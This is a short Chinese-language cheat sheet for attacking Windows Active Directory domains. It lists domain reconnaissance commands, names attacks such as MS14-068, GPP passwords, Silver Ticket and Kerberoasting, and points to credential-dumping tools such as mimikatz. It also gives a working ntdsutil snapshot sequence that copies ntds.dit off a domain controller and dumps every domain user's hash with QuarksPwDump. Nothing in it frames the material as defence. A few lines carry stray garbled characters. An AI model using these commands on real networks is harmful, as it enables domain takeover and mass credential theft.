初級AD域滲透系列

 net group /domain  獲得所有域用戶組列表
 net group “domain admins” /domain  獲得域管理員列表
 net group “enterprise admins” /domain  獲得企業管理員列表
 net localgroup administrators /domain 獲取域內置administrators組用戶，這個組內成員包含enterprise admins與domain admins，權限一樣
 net group “domain controllers” /domain 獲得域控制器列表
 net group “domain computers” /domain 獲得所有域成員計算機列表
 net user /domain 獲得所有域用戶列表
 net user someuser /domain 獲得指定賬戶someuser的詳細信息
 net accounts /domain 獲得域密碼策略設置，密碼長短，錯誤鎖定等信息
 nltest /domain_trusts 獲取域信任信息
 net view 
 net view /domain:域名
 net config workstation
 systeminfo
 ipconfig /all
 cmdkey /list
echo %logonserver%
ping -n 1 hostname

　　

例：dsquery server -domain super.com | dsget server -dnsname -site (搜索域內所有域控制器並顯示他們的DNS主機名和站點名稱）
查詢域內計算機：dsquery computer
例：dsquery computer domainroot -name admin* -limit 10（搜索域內名稱以"admin"開頭的10台機器）)
查詢域用戶：dsquery user
dsquery user domainroot -name admin* -limit 10（搜索域內以"admin" 開頭的10個用戶）
查詢域內聯系人：dsquery contact
例：dsquery contact domainroot -name admin* -limit 10 (搜索域內以admin開頭的10個聯系人)
查詢域內子網：dsquery subnet - 低調求發展.
查詢域內用戶組：dsquery group6 B, K' T% U& |
例：dsquery group dc=super,dc=com |more (搜索在DC=SUPER,DC=COM 雨中的所有組
查詢域內組織單位：dsquery ou
查詢域內站點： dsquery site
例：dsquery site -o rdn （搜索域中所有站點的名稱）
注：-limit 參數不指定查詢數量，則默認顯示前100條結果
例：dsquery user domainroot -name admin* -limit 10（搜索域內以"admin" 開頭的前10個用戶）

　　

神器kekeo [ms14068,比PyKEK方便]

 GPP [KB2962486]

十分鍾愛SQL SERVER 弱口令和潛在的Silver Ticket攻擊 [SPN]

本地administrator帳戶通殺 + Incognito 

DomainCache的破解

管理員配置錯誤

 

工具：

1.mimikatz.exe
https://github.com/gentilkiwi/mimikatz/

2.Pwdump7.exe

3.QuarksPwDump.exe

4.psexec.exe
https://technet.microsoft.com/ko-kr/sysinternals/bb897553.aspx

5.kerberoast
https://github.com/nidem/kerberoast

6.WMIEXEC.vbs
https://www.t00ls.net/thread-21167-1-1.html

　

域控導出ntds.dit

ntdsutil snapshot "activate instance ntds" create quit quit 
ntdsutil snapshot "mount {GUID}" quit quit 
copy  MOUNT_POINT\windows\NTDS\ntds.dit  c:\ntds.dit 
ntdsutil snapshot "unmount {GUID}" quit quit 
ntdsutil snapshot "delete {GUID}" quit quit
然后用QuarksPwDump直接dump列表。

QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit

　　

　

內網滲透相關
滲透學習案例：https://github.com/l3m0n/pentest_study

導出當前域內所有用戶hash的技術整理：http://drops.wooyun.org/tips/6617

在遠程系統上執行程序的技術整理：http://drops.wooyun.org/tips/7358

利用Powershell快速導出域控所有用戶Hash：http://drops.wooyun.org/tips/10181

域滲透——Local Administrator Password Solution：http://drops.wooyun.org/tips/10496

域滲透——Pass The Hash & Pass The Key：http://drops.wooyun.org/tips/11631

滲透技巧——通過cmd上傳文件的N種方法：http://drops.wooyun.org/tips/14101

滲透技巧——如何巧妙利用PSR監控Windows桌面：http://drops.wooyun.org/tips/13125

安全分析